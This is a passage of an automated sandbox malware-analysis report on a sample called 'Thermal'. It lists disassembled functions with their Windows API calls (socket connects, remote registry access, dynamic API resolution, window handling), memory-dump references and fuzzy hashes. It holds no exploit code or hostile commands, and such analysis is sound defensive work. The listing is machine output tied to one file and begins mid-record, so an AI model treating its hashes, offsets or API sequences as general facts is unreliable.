                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 7ff6e5372b57a6089511ea1ad3449664f9fe386fc4e95d1d220492953798d77b
                                                      • Instruction ID: cc6b99caa18d3a5de2cc333579c98577ac74ea95c686e612b7aed7b130553f40
                                                      • Opcode Fuzzy Hash: 7ff6e5372b57a6089511ea1ad3449664f9fe386fc4e95d1d220492953798d77b
                                                      • Instruction Fuzzy Hash: CE313738604194EFEB22CF58DC88F6A37E1EB5A758F1911A4F5148F6B1CB72AC84CB50
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E2CA
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E2F0
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0017E2F3
                                                      • SysAllocString.OLEAUT32(?), ref: 0017E311
                                                      • SysFreeString.OLEAUT32(?), ref: 0017E31A
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0017E33F
                                                      • SysAllocString.OLEAUT32(?), ref: 0017E34D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: fd5fe6d5916f7784ed04600f1ae5b72eb3cb9f6b4d21234a5e68638c02c53b07
                                                      • Instruction ID: 7ecf7415243fd9311e6887dc6c35cdc5ff14a66545c071fd6fc0cf4df2f1d529
                                                      • Opcode Fuzzy Hash: fd5fe6d5916f7784ed04600f1ae5b72eb3cb9f6b4d21234a5e68638c02c53b07
                                                      • Instruction Fuzzy Hash: 95214F76604219AF9B11DFB8DC88CBB77FCEB0D360B548165FA18DB250D770AD858760
                                                      APIs
                                                        • Part of subcall function 00198475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001984A0
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001968B1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 001968C0
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001968F9
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00196902
                                                      • WSAGetLastError.WSOCK32 ref: 0019690C
                                                      • closesocket.WSOCK32(00000000), ref: 00196935
                                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0019694E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 910771015-0
                                                      • Opcode ID: 9ae34a7efa8a915ae46af1380eed7e6dd437aded9661acf200d20aba3b40883d
                                                      • Instruction ID: c92573d32d8e0c76fbd5fc79008800f0c3f97ba9337adc27179a16281bec3661
                                                      • Opcode Fuzzy Hash: 9ae34a7efa8a915ae46af1380eed7e6dd437aded9661acf200d20aba3b40883d
                                                      • Instruction Fuzzy Hash: D531E471600218AFDF10AF64DC85FBE7BADEB58724F044129FD05AB290DB70AD448BA1
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E3A5
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0017E3CB
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0017E3CE
                                                      • SysAllocString.OLEAUT32 ref: 0017E3EF
                                                      • SysFreeString.OLEAUT32 ref: 0017E3F8
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0017E412
                                                      • SysAllocString.OLEAUT32(?), ref: 0017E420
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 75b8a2668339fcf1b482f221cde47a4d0f3b5cfee32f1c80827065ee2fd7ff83
                                                      • Instruction ID: ddbd2d8cff4c88edd748933a7c70d9edb0dd5afc523234c41d71e62f8c80621b
                                                      • Opcode Fuzzy Hash: 75b8a2668339fcf1b482f221cde47a4d0f3b5cfee32f1c80827065ee2fd7ff83
                                                      • Instruction Fuzzy Hash: AA214435604204AFAB119FA8DC88DAF77ECEB0D360B018665FA19CB260D770EC818B64
                                                      APIs
                                                        • Part of subcall function 00122111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0012214F
                                                        • Part of subcall function 00122111: GetStockObject.GDI32(00000011), ref: 00122163
                                                        • Part of subcall function 00122111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012216D
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001A7C57
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001A7C64
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001A7C6F
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001A7C7E
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001A7C8A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: b7597690b442e32ee89d41fb11247a95bb851eb464e4ff4670fc7744d1fd9c81
                                                      • Instruction ID: beb1e2e7727505121c237ebce2f1392f4fc671a6d19291f3c86bbbfeef0eb96f
                                                      • Opcode Fuzzy Hash: b7597690b442e32ee89d41fb11247a95bb851eb464e4ff4670fc7744d1fd9c81
                                                      • Instruction Fuzzy Hash: 3711B6B615021ABEEF158F60CC85EEB7F5DEF09768F014115BB04A6090C7719C21DBA0
                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 00149D16
                                                        • Part of subcall function 001433B7: EncodePointer.KERNEL32(00000000), ref: 001433BA
                                                        • Part of subcall function 001433B7: __initp_misc_winsig.LIBCMT ref: 001433D5
                                                        • Part of subcall function 001433B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0014A0D0
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0014A0E4
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0014A0F7
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0014A10A
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0014A11D
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0014A130
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0014A143
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0014A156
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0014A169
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0014A17C
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0014A18F
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0014A1A2
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0014A1B5
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0014A1C8
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0014A1DB
                                                        • Part of subcall function 001433B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0014A1EE
                                                      • __mtinitlocks.LIBCMT ref: 00149D1B
                                                      • __mtterm.LIBCMT ref: 00149D24
                                                        • Part of subcall function 00149D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00149D29,00147EFD,001DCD38,00000014), ref: 00149E86
                                                        • Part of subcall function 00149D8C: _free.LIBCMT ref: 00149E8D
                                                        • Part of subcall function 00149D8C: DeleteCriticalSection.KERNEL32(001E0C00,?,?,00149D29,00147EFD,001DCD38,00000014), ref: 00149EAF
                                                      • __calloc_crt.LIBCMT ref: 00149D49
                                                      • __initptd.LIBCMT ref: 00149D6B
                                                      • GetCurrentThreadId.KERNEL32 ref: 00149D72
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 3567560977-0
                                                      • Opcode ID: aa0442e1d949b6e39b1810218d7f3993b819b6a91075afa81754f2a8405f6873
                                                      • Instruction ID: e0c7870ffc3ed990d6236c8ef60eccb3eeda3e0810367d27294b10d9d167c7d3
                                                      • Opcode Fuzzy Hash: aa0442e1d949b6e39b1810218d7f3993b819b6a91075afa81754f2a8405f6873
                                                      • Instruction Fuzzy Hash: D1F090329497115AE739BBF47C4364B2AD4DF51730F200759F468DA0F3EF50C9814190
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00144282,?), ref: 001441D3
                                                      • GetProcAddress.KERNEL32(00000000), ref: 001441DA
                                                      • EncodePointer.KERNEL32(00000000), ref: 001441E6
                                                      • DecodePointer.KERNEL32(00000001,00144282,?), ref: 00144203
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoInitialize$combase.dll
                                                      • API String ID: 3489934621-340411864
                                                      • Opcode ID: 5d48e4b8de2af29c4bc910bae3963e178f8fe71450002e7ced53f3508fa94f6e
                                                      • Instruction ID: ef118156f503f766582abf0649c5438c328319944da570c3cff612620df4f43e
                                                      • Opcode Fuzzy Hash: 5d48e4b8de2af29c4bc910bae3963e178f8fe71450002e7ced53f3508fa94f6e
                                                      • Instruction Fuzzy Hash: C1E01A70690741AFDB512FB0EC8DB4936A6B758B0BF604924F511D98B0DBB554C58F00
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001441A8), ref: 001442A8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 001442AF
                                                      • EncodePointer.KERNEL32(00000000), ref: 001442BA
                                                      • DecodePointer.KERNEL32(001441A8), ref: 001442D5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                      • String ID: RoUninitialize$combase.dll
                                                      • API String ID: 3489934621-2819208100
                                                      • Opcode ID: 4f0cab6b0e34b6b98a80fe8e8181f2a00d7a81113be38bf98944a1b11dbdadf3
                                                      • Instruction ID: a403672efe430087b4fde15a9a0d54f0d0071c43e7d6242f888b63b63fcaba75
                                                      • Opcode Fuzzy Hash: 4f0cab6b0e34b6b98a80fe8e8181f2a00d7a81113be38bf98944a1b11dbdadf3
                                                      • Instruction Fuzzy Hash: 68E0B670650740AFDB529FA0ED8DB4A3AA5B708B0AF900618F011D99B0CBB485D4DA10
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 001221B8
                                                      • GetWindowRect.USER32(?,?), ref: 001221F9
                                                      • ScreenToClient.USER32(?,?), ref: 00122221
                                                      • GetClientRect.USER32(?,?), ref: 00122350
                                                      • GetWindowRect.USER32(?,?), ref: 00122369
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      • Opcode ID: 45ac7d4b05f150dbf5813a7f4e252bfde5d2ac916db95ad5c4d495933c470820
                                                      • Instruction ID: b081266c3a6a8e1e71710111b37a93f903bedebc08837b4ff34c1ccf80f1fbe6
                                                      • Opcode Fuzzy Hash: 45ac7d4b05f150dbf5813a7f4e252bfde5d2ac916db95ad5c4d495933c470820
                                                      • Instruction Fuzzy Hash: 35B17039900249EBDF14CFA8C5807EEB7B1FF08710F148169ED69EB254DB35AA60DB64
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memmove$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 3253778849-0
                                                      • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                      • Instruction ID: 2186326155f1a0005fab314c3996bc8578aff0bb28f55fd9058a7e5cf11dcac3
                                                      • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                      • Instruction Fuzzy Hash: 8461CE3050069AABCF15FFA4CC82EFE3BA9AF25308F044559F8596B1A2DB349E55CB50
                                                      APIs
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                        • Part of subcall function 001A147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001A040D,?,?), ref: 001A1491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001A091D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001A095D
                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001A0980
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001A09A9
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001A09EC
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 001A09F9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                      • String ID:
                                                      • API String ID: 4046560759-0
                                                      • Opcode ID: d1c0aa812308217aaa39527c0c0e0e6991ed7588e11ea985749f18d801e8127b
                                                      • Instruction ID: 5d79f97b0a577473449ffa2a8c6cd0a9f7741f015a92a710062d58898afc082f
                                                      • Opcode Fuzzy Hash: d1c0aa812308217aaa39527c0c0e0e6991ed7588e11ea985749f18d801e8127b
                                                      • Instruction Fuzzy Hash: 51516631208204AFD715EF64C885E6FBBE9FF99314F044A1DF589872A2DB31E945CB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0017F6A2
                                                      • VariantClear.OLEAUT32(00000013), ref: 0017F714
                                                      • VariantClear.OLEAUT32(00000000), ref: 0017F76F
                                                      • _memmove.LIBCMT ref: 0017F799
                                                      • VariantClear.OLEAUT32(?), ref: 0017F7E6
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0017F814
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                      • String ID:
                                                      • API String ID: 1101466143-0
                                                      • Opcode ID: 0590f1d8cd743501f89072ca8da662663e1bcd588126ed7cabf2d08ea0eb4fa9
                                                      • Instruction ID: dd0ab446fcce476c358acdc8935f753b59bf9771636f30f918771c304dd0aab6
                                                      • Opcode Fuzzy Hash: 0590f1d8cd743501f89072ca8da662663e1bcd588126ed7cabf2d08ea0eb4fa9
                                                      • Instruction Fuzzy Hash: 7A5139B5A00209EFDB14CF58C884AAAB7B8FF4C354B15856EE959DB304D731E952CFA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 001829FF
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00182A4A
                                                      • IsMenu.USER32(00000000), ref: 00182A6A
                                                      • CreatePopupMenu.USER32 ref: 00182A9E
                                                      • GetMenuItemCount.USER32(000000FF), ref: 00182AFC
                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00182B2D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                      • String ID:
                                                      • API String ID: 3311875123-0
                                                      • Opcode ID: 8876b68976837fb7d880918ccb3687005e3debbf2b65d854260a0c322632f06f
                                                      • Instruction ID: 6282d94b0be3714c714bfc57e99db59de8e5ac05d1f04d921fcb3eecbaab716d
                                                      • Opcode Fuzzy Hash: 8876b68976837fb7d880918ccb3687005e3debbf2b65d854260a0c322632f06f
                                                      • Instruction Fuzzy Hash: F251BD70601249DFCF2AEF68D8C8AAEBBF5EF15314F104259E8119B2A1D7709A44CF51
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 00121B76
                                                      • GetWindowRect.USER32(?,?), ref: 00121BDA
                                                      • ScreenToClient.USER32(?,?), ref: 00121BF7
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00121C08
                                                      • EndPaint.USER32(?,?), ref: 00121C52
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                      • String ID:
                                                      • API String ID: 1827037458-0
                                                      • Opcode ID: bb8169880b776bb90235eabba2939e2547b6948f7c15588fc34aec83f7abfc61
                                                      • Instruction ID: a4915dabb01c4ea0d15ab3a97e2f3989ee1e0ca4e7f87ffdc95f444be1568eb5
                                                      • Opcode Fuzzy Hash: bb8169880b776bb90235eabba2939e2547b6948f7c15588fc34aec83f7abfc61
                                                      • Instruction Fuzzy Hash: E441D230508310AFD711DF24ECC8FBA7BF8EB69361F140669F9658B2A1C77098A5DB61
                                                      APIs
                                                      • ShowWindow.USER32(001E77B0,00000000,010E4AA0,?,?,001E77B0,?,001ABC1A,?,?), ref: 001ABD84
                                                      • EnableWindow.USER32(?,00000000), ref: 001ABDA8
                                                      • ShowWindow.USER32(001E77B0,00000000,010E4AA0,?,?,001E77B0,?,001ABC1A,?,?), ref: 001ABE08
                                                      • ShowWindow.USER32(?,00000004,?,001ABC1A,?,?), ref: 001ABE1A
                                                      • EnableWindow.USER32(?,00000001), ref: 001ABE3E
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 001ABE61
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
